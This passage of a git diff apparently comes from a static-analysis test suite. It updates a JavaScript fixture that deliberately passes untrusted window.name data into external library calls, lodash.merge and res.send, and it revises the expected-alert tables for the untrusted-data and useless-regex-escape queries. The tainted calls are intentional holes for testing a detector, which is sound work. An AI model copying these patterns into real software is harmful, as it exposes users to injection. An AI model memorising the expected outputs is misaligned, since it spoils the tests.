'x'] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | -| tst-UntrustedDataToExternalAPI.js:7:16:7:24 | untrusted | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:7:16:7:24 | untrusted | Call to external-lib() [param *] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | -| tst-UntrustedDataToExternalAPI.js:8:31:8:39 | untrusted | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:8:31:8:39 | untrusted | Call to external-lib() [param *] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | -| tst-UntrustedDataToExternalAPI.js:9:18:9:26 | untrusted | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:9:18:9:26 | untrusted | Call to external-lib() [param 0] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | -| tst-UntrustedDataToExternalAPI.js:10:13:10:33 | ['x', u ... d, 'y'] | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:10:13:10:33 | ['x', u ... d, 'y'] | Call to external-lib() [param 0] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | -| tst-UntrustedDataToExternalAPI.js:11:20:11:28 | untrusted | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:11:20:11:28 | untrusted | Call to external-lib() [param 1] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | -| tst-UntrustedDataToExternalAPI.js:13:8:17:5 | {\\n ... }\\n } | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:13:8:17:5 | {\\n ... }\\n } | Call to external-lib() [param 0 'x'] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | -| tst-UntrustedDataToExternalAPI.js:33:14:33:22 | untrusted | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:33:14:33:22 | untrusted | Call to external-lib.get.[callback].[param 'res'].send() [param 0] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | -| tst-UntrustedDataToExternalAPI.js:34:34:34:42 | untrusted | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:34:34:34:42 | untrusted | Call to external-lib.get.[callback].[param 'req'].app.locals.something.foo() [param 0] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | -| tst-UntrustedDataToExternalAPI.js:41:7:41:8 | {} | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:41:7:41:8 | {} | Call to lodash.merge() [param 0] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | -| tst-UntrustedDataToExternalAPI.js:41:11:45:1 | {\\n x ... usted\\n} | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:41:11:45:1 | {\\n x ... usted\\n} | Call to lodash.merge() [param 1] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | diff --git a/javascript/ql/test/query-tests/Security/CWE-020/UntrustedDataToExternalAPI/UntrustedDataToExternalAPI.qlref b/javascript/ql/test/query-tests/Security/CWE-020/UntrustedDataToExternalAPI/UntrustedDataToExternalAPI.qlref index 7752378db17d..72cf5459b163 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/UntrustedDataToExternalAPI/UntrustedDataToExternalAPI.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-020/UntrustedDataToExternalAPI/UntrustedDataToExternalAPI.qlref @@ -1 +1,2 @@ -Security/CWE-020/UntrustedDataToExternalAPI.ql +query: Security/CWE-020/UntrustedDataToExternalAPI.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-020/UntrustedDataToExternalAPI/tst-UntrustedDataToExternalAPI.js b/javascript/ql/test/query-tests/Security/CWE-020/UntrustedDataToExternalAPI/tst-UntrustedDataToExternalAPI.js index 864b2b68a01c..ece90af5215c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/UntrustedDataToExternalAPI/tst-UntrustedDataToExternalAPI.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/UntrustedDataToExternalAPI/tst-UntrustedDataToExternalAPI.js @@ -1,20 +1,20 @@ let externalLib = require('external-lib'); -let untrusted = window.name; +let untrusted = window.name; // $ Source -externalLib(untrusted); -externalLib({x: untrusted}); -externalLib(...untrusted); -externalLib(...window.CONFIG, untrusted); -externalLib({ ...untrusted }); -externalLib(['x', untrusted, 'y']); -externalLib('foo', untrusted); +externalLib(untrusted); // $ Alert +externalLib({x: untrusted}); // $ Alert +externalLib(...untrusted); // $ Alert +externalLib(...window.CONFIG, untrusted); // $ Alert +externalLib({ ...untrusted }); // $ Alert +externalLib(['x', untrusted, 'y']); // $ Alert +externalLib('foo', untrusted); // $ Alert externalLib({ x: { y: { z: untrusted } - } + } // $ Alert }); function getDeepUntrusted() { @@ -30,16 +30,16 @@ function getDeepUntrusted() { externalLib(getDeepUntrusted()); externalLib.get('/foo', (req, res) => { - res.send(untrusted); - req.app.locals.something.foo(untrusted); + res.send(untrusted); // $ Alert + req.app.locals.something.foo(untrusted); // $ Alert }); let jsonSafeParse = require('json-safe-parse'); jsonSafeParse(untrusted); // no need to report; has known taint step let merge = require('lodash.merge'); -merge({}, { +merge({}, { // $ Alert x: untrusted, // should not be treated as individual named parameters y: untrusted, z: untrusted -}); +}); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/UselessCharacterEscape.expected b/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/UselessCharacterEscape.expected index 6cd6e27b0edc..b3c764e85cbf 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/UselessCharacterEscape.expected +++ b/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/UselessCharacterEscape.expected @@ -1,59 +1,59 @@ -| tst-escapes.js:19:8:19:11 | "\\ " | The escape sequence '\\ ' is equivalent to just ' '. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\a' is equivalent to just 'a'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\e' is equivalent to just 'e'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\g' is equivalent to just 'g'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\h' is equivalent to just 'h'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\i' is equivalent to just 'i'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\j' is equivalent to just 'j'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\l' is equivalent to just 'l'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\m' is equivalent to just 'm'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\o' is equivalent to just 'o'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\q' is equivalent to just 'q'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\y' is equivalent to just 'y'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\z' is equivalent to just 'z'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\A' is equivalent to just 'A'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\C' is equivalent to just 'C'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\E' is equivalent to just 'E'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\F' is equivalent to just 'F'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\G' is equivalent to just 'G'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\H' is equivalent to just 'H'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\I' is equivalent to just 'I'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\J' is equivalent to just 'J'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\K' is equivalent to just 'K'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\L' is equivalent to just 'L'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\M' is equivalent to just 'M'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\N' is equivalent to just 'N'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\O' is equivalent to just 'O'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\Q' is equivalent to just 'Q'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\R' is equivalent to just 'R'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\T' is equivalent to just 'T'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\U' is equivalent to just 'U'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\V' is equivalent to just 'V'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\X' is equivalent to just 'X'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\Y' is equivalent to just 'Y'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\Z' is equivalent to just 'Z'. | -| tst-escapes.js:22:1:22:28 | /\\`\\1\\2 ... \\0\\-\\=/ | The escape sequence '\\=' is equivalent to just '='. | -| tst-escapes.js:22:1:22:28 | /\\`\\1\\2 ... \\0\\-\\=/ | The escape sequence '\\`' is equivalent to just '`'. | -| tst-escapes.js:23:1:23:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\!' is equivalent to just '!'. | -| tst-escapes.js:23:1:23:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\#' is equivalent to just '#'. | -| tst-escapes.js:23:1:23:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\%' is equivalent to just '%'. | -| tst-escapes.js:23:1:23:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\&' is equivalent to just '&'. | -| tst-escapes.js:23:1:23:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\@' is equivalent to just '@'. | -| tst-escapes.js:23:1:23:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\_' is equivalent to just '_'. | -| tst-escapes.js:23:1:23:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\~' is equivalent to just '~'. | -| tst-escapes.js:24:1:24:15 | /\\[\\]\\'\\\\,\\.\\// | The escape sequence '\\'' is equivalent to just '''. | -| tst-escapes.js:25:1:25:16 | /\\{\\}\\"\\\|\\<\\>\\?/ | The escape sequence '\\"' is equivalent to just '"'. | -| tst-escapes.js:25:1:25:16 | /\\{\\}\\"\\\|\\<\\>\\?/ | The escape sequence '\\<' is equivalent to just '<'. | -| tst-escapes.js:25:1:25:16 | /\\{\\}\\"\\\|\\<\\>\\?/ | The escape sequence '\\>' is equivalent to just '>'. | -| tst-escapes.js:26:1:26:4 | /\\ / | The escape sequence '\\ ' is equivalent to just ' '. | -| tst-escapes.js:29:8:29:11 | "\\a" | The escape sequence '\\a' is equivalent to just 'a'. | -| tst-escapes.js:31:8:31:13 | "\\\\\\a" | The escape sequence '\\a' is equivalent to just 'a'. | -| tst-escapes.js:33:8:33:15 | "\\\\\\\\\\a" | The escape sequence '\\a' is equivalent to just 'a'. | -| tst-escapes.js:35:8:35:17 | "\\\\\\\\\\\\\\a" | The escape sequence '\\a' is equivalent to just 'a'. | -| tst-escapes.js:37:8:37:19 | "\\\\\\\\\\\\\\\\\\a" | The escape sequence '\\a' is equivalent to just 'a'. | -| tst-escapes.js:42:1:42:4 | "\\." | The escape sequence '\\.' is equivalent to just '.'. | -| tst-escapes.js:48:8:48:15 | "'\\'\\\\'" | The escape sequence '\\'' is equivalent to just '''. | -| tst-escapes.js:50:8:50:15 | '"\\"\\\\"' | The escape sequence '\\"' is equivalent to just '"'. | -| tst-escapes.js:66:8:66:13 | "\\\\\\]" | The escape sequence '\\]' is equivalent to just ']'. | -| tst-escapes.js:67:8:67:14 | "x\\\\\\]" | The escape sequence '\\]' is equivalent to just ']'. | -| tst-escapes.js:71:8:71:17 | "\\\\\\\\\\\\\\]" | The escape sequence '\\]' is equivalent to just ']'. | +| tst-escapes.js:17:8:17:11 | "\\ " | The escape sequence '\\ ' is equivalent to just ' '. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\a' is equivalent to just 'a'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\e' is equivalent to just 'e'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\g' is equivalent to just 'g'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\h' is equivalent to just 'h'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\i' is equivalent to just 'i'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\j' is equivalent to just 'j'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\l' is equivalent to just 'l'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\m' is equivalent to just 'm'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\o' is equivalent to just 'o'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\q' is equivalent to just 'q'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\y' is equivalent to just 'y'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\z' is equivalent to just 'z'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\A' is equivalent to just 'A'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\C' is equivalent to just 'C'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\E' is equivalent to just 'E'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\F' is equivalent to just 'F'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\G' is equivalent to just 'G'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\H' is equivalent to just 'H'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\I' is equivalent to just 'I'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\J' is equivalent to just 'J'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\K' is equivalent to just 'K'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\L' is equivalent to just 'L'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\M' is equivalent to just 'M'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\N' is equivalent to just 'N'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\O' is equivalent to just 'O'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\Q' is equivalent to just 'Q'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\R' is equivalent to just 'R'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\T' is equivalent to just 'T'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\U' is equivalent to just 'U'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\V' is equivalent to just 'V'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\X' is equivalent to just 'X'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\Y' is equivalent to just 'Y'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\Z' is equivalent to just 'Z'. | +| tst-escapes.js:20:1:20:28 | /\\`\\1\\2 ... \\0\\-\\=/ | The escape sequence '\\=' is equivalent to just '='. | +| tst-escapes.js:20:1:20:28 | /\\`\\1\\2 ... \\0\\-\\=/ | The escape sequence '\\`' is equivalent to just '`'. | +| tst-escapes.js:21:1:21:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\!' is equivalent to just '!'. | +| tst-escapes.js:21:1:21:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\#' is equivalent to just '#'. | +| tst-escapes.js:21:1:21:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\%' is equivalent to just '%'. | +| tst-escapes.js:21:1:21:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\&' is equivalent to just '&'. | +| tst-escapes.js:21:1:21:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\@' is equivalent to just '@'. | +| tst-escapes.js:21:1:21:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\_' is equivalent to just '_'. | +| tst-escapes.js:21:1:21:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\~' is equivalent to just '~'. | +| tst-escapes.js:22:1:22:15 | /\\[\\]\\'\\\\,\\.\\// | The escape sequence '\\'' is equivalent to just '''. | +| tst-escapes.js:23:1:23:16 | /\\{\\}\\"\\\|\\<\\>\\?/ | The escape sequence '\\"' is equivalent to just '"'. | +| tst-escapes.js:23:1:23:16 | /\\{\\}\\"\\\|\\<\\>\\?/ | The escape sequence '\\<' is equivalent to just '<'. | +| tst-escapes.js:23:1:23:16 | /\\{\\}\\"\\\|\\<\\>\\?/ | The escape sequence '\\>' is equivalent to just '>'. | +| tst-escapes.js:24:1:24:4 | /\\ / | The escape sequence '\\ ' is equivalent to just ' '. | +| tst-escapes.js:27:8:27:11 | "\\a" | The escape sequence '\\a' is equivalent to just 'a'. | +| tst-escapes.js:29:8:29:13 | "\\\\\\a" | The escape sequence '\\a' is equivalent to just 'a'. | +| tst-escapes.js:31:8:31:15 | "\\\\\\\\\\a" | The escape sequence '\\a' is equivalent to just 'a'. | +| tst-escapes.js:33:8:33:17 | "\\\\\\\\\\\\\\a" | The escape sequence '\\a' is equivalent to just 'a'. | +| tst-escapes.js:35:8:35:19 | "\\\\\\\\\\\\\\\\\\a" | The escape sequence '\\a' is equivalent to just 'a'. | +| tst-escapes.js:40:1:40:4 | "\\." | The escape sequence '\\.' is equivalent to just '.'. | +| tst-escapes.js:46:8:46:15 | "'\\'\\\\'" | The escape sequence '\\'' is equivalent to just '''. | +| tst-escapes.js:48:8:48:15 | '"\\"\\\\"' | The escape sequence '\\"' is equivalent to just '"'. | +| tst-escapes.js:64:8:64:13 | "\\\\\\]" | The escape sequence '\\]' is equivalent to just ']'. | +| tst-escapes.js:65:8:65:14 | "x\\\\\\]" | The escape sequence '\\]' is equivalent to just ']'. | +| tst-escapes.js:69:8:69:17 | "\\\\\\\\\\\\\\]" | The escape sequence '\\]' is equivalent to just ']'. | diff --git a/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/UselessRegExpCharacterEscape.expected b/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/UselessRegExpCharacterEscape.expected index f7badbcbd86a..8bd58ce20b93 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/UselessRegExpCharacterEscape.expected +++ b/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/UselessRegExpCharacterEscape.expected @@ -1,43 +1,43 @@ -| tst-escapes.js:13:11:13:12 | '\\b' is a backspace, and not a word-boundary assertion | The escape sequence '\\b' is a backspace, and not a word-boundary assertion when it is used in a $@. | tst-escapes.js:13:8:13:61 | "\\a\\b\\c ... \\x\\y\\z" | regular expression | -| tst-escapes.js:13:13:13:14 | '\\c' is equivalent to just 'c', so the sequence is not a character class | The escape sequence '\\c' is equivalent to just 'c', so the sequence is not a character class when it is used in a $@. | tst-escapes.js:13:8:13:61 | "\\a\\b\\c ... \\x\\y\\z" | regular expression | -| tst-escapes.js:13:15:13:16 | '\\d' is equivalent to just 'd', so the sequence is not a character class | The escape sequence '\\d' is equivalent to just 'd', so the sequence is not a character class when it is used in a $@. | tst-escapes.js:13:8:13:61 | "\\a\\b\\c ... \\x\\y\\z" | regular expression | -| tst-escapes.js:13:29:13:30 | '\\k' is equivalent to just 'k', so the sequence is not a backreference | The escape sequence '\\k' is equivalent to just 'k', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:13:8:13:61 | "\\a\\b\\c ... \\x\\y\\z" | regular expression | -| tst-escapes.js:13:39:13:40 | '\\p' is equivalent to just 'p', so the sequence is not a character class | The escape sequence '\\p' is equivalent to just 'p', so the sequence is not a character class when it is used in a $@. | tst-escapes.js:13:8:13:61 | "\\a\\b\\c ... \\x\\y\\z" | regular expression | -| tst-escapes.js:13:45:13:46 | '\\s' is equivalent to just 's', so the sequence is not a character class | The escape sequence '\\s' is equivalent to just 's', so the sequence is not a character class when it is used in a $@. | tst-escapes.js:13:8:13:61 | "\\a\\b\\c ... \\x\\y\\z" | regular expression | -| tst-escapes.js:14:11:14:12 | '\\B' is equivalent to just 'B', so the sequence is not an assertion | The escape sequence '\\B' is equivalent to just 'B', so the sequence is not an assertion when it is used in a $@. | tst-escapes.js:14:8:14:59 | "\\A\\B\\C ... \\X\\Y\\Z" | regular expression | -| tst-escapes.js:14:15:14:16 | '\\D' is equivalent to just 'D', so the sequence is not a character class | The escape sequence '\\D' is equivalent to just 'D', so the sequence is not a character class when it is used in a $@. | tst-escapes.js:14:8:14:59 | "\\A\\B\\C ... \\X\\Y\\Z" | regular expression | -| tst-escapes.js:14:39:14:40 | '\\P' is equivalent to just 'P', so the sequence is not a character class | The escape sequence '\\P' is equivalent to just 'P', so the sequence is not a character class when it is used in a $@. | tst-escapes.js:14:8:14:59 | "\\A\\B\\C ... \\X\\Y\\Z" | regular expression | -| tst-escapes.js:14:45:14:46 | '\\S' is equivalent to just 'S', so the sequence is not a character class | The escape sequence '\\S' is equivalent to just 'S', so the sequence is not a character class when it is used in a $@. | tst-escapes.js:14:8:14:59 | "\\A\\B\\C ... \\X\\Y\\Z" | regular expression | -| tst-escapes.js:15:11:15:12 | '\\1' is equivalent to just '1', so the sequence is not a backreference | The escape sequence '\\1' is equivalent to just '1', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:15:8:15:35 | "\\`\\1\\2 ... \\0\\-\\=" | regular expression | -| tst-escapes.js:15:13:15:14 | '\\2' is equivalent to just '2', so the sequence is not a backreference | The escape sequence '\\2' is equivalent to just '2', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:15:8:15:35 | "\\`\\1\\2 ... \\0\\-\\=" | regular expression | -| tst-escapes.js:15:15:15:16 | '\\3' is equivalent to just '3', so the sequence is not a backreference | The escape sequence '\\3' is equivalent to just '3', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:15:8:15:35 | "\\`\\1\\2 ... \\0\\-\\=" | regular expression | -| tst-escapes.js:15:17:15:18 | '\\4' is equivalent to just '4', so the sequence is not a backreference | The escape sequence '\\4' is equivalent to just '4', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:15:8:15:35 | "\\`\\1\\2 ... \\0\\-\\=" | regular expression | -| tst-escapes.js:15:19:15:20 | '\\5' is equivalent to just '5', so the sequence is not a backreference | The escape sequence '\\5' is equivalent to just '5', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:15:8:15:35 | "\\`\\1\\2 ... \\0\\-\\=" | regular expression | -| tst-escapes.js:15:21:15:22 | '\\6' is equivalent to just '6', so the sequence is not a backreference | The escape sequence '\\6' is equivalent to just '6', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:15:8:15:35 | "\\`\\1\\2 ... \\0\\-\\=" | regular expression | -| tst-escapes.js:15:23:15:24 | '\\7' is equivalent to just '7', so the sequence is not a backreference | The escape sequence '\\7' is equivalent to just '7', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:15:8:15:35 | "\\`\\1\\2 ... \\0\\-\\=" | regular expression | -| tst-escapes.js:15:25:15:26 | '\\8' is equivalent to just '8', so the sequence is not a backreference | The escape sequence '\\8' is equivalent to just '8', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:15:8:15:35 | "\\`\\1\\2 ... \\0\\-\\=" | regular expression | -| tst-escapes.js:15:27:15:28 | '\\9' is equivalent to just '9', so the sequence is not a backreference | The escape sequence '\\9' is equivalent to just '9', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:15:8:15:35 | "\\`\\1\\2 ... \\0\\-\\=" | regular expression | -| tst-escapes.js:15:31:15:32 | '\\-' is equivalent to just '-', so the sequence may still represent a meta-character | The escape sequence '\\-' is equivalent to just '-', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:15:8:15:35 | "\\`\\1\\2 ... \\0\\-\\=" | regular expression | -| tst-escapes.js:16:17:16:18 | '\\$' is equivalent to just '$', so the sequence may still represent a meta-character | The escape sequence '\\$' is equivalent to just '$', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:16:8:16:35 | "\\~\\!\\@ ... \\)\\_\\+" | regular expression | -| tst-escapes.js:16:21:16:22 | '\\^' is equivalent to just '^', so the sequence may still represent a meta-character | The escape sequence '\\^' is equivalent to just '^', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:16:8:16:35 | "\\~\\!\\@ ... \\)\\_\\+" | regular expression | -| tst-escapes.js:16:25:16:26 | '\\*' is equivalent to just '*', so the sequence may still represent a meta-character | The escape sequence '\\*' is equivalent to just '*', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:16:8:16:35 | "\\~\\!\\@ ... \\)\\_\\+" | regular expression | -| tst-escapes.js:16:27:16:28 | '\\(' is equivalent to just '(', so the sequence may still represent a meta-character | The escape sequence '\\(' is equivalent to just '(', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:16:8:16:35 | "\\~\\!\\@ ... \\)\\_\\+" | regular expression | -| tst-escapes.js:16:29:16:30 | '\\)' is equivalent to just ')', so the sequence may still represent a meta-character | The escape sequence '\\)' is equivalent to just ')', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:16:8:16:35 | "\\~\\!\\@ ... \\)\\_\\+" | regular expression | -| tst-escapes.js:16:33:16:34 | '\\+' is equivalent to just '+', so the sequence may still represent a meta-character | The escape sequence '\\+' is equivalent to just '+', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:16:8:16:35 | "\\~\\!\\@ ... \\)\\_\\+" | regular expression | -| tst-escapes.js:17:9:17:10 | '\\[' is equivalent to just '[', so the sequence may still represent a meta-character | The escape sequence '\\[' is equivalent to just '[', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:17:8:17:22 | "\\[\\]\\'\\\\,\\.\\/" | regular expression | -| 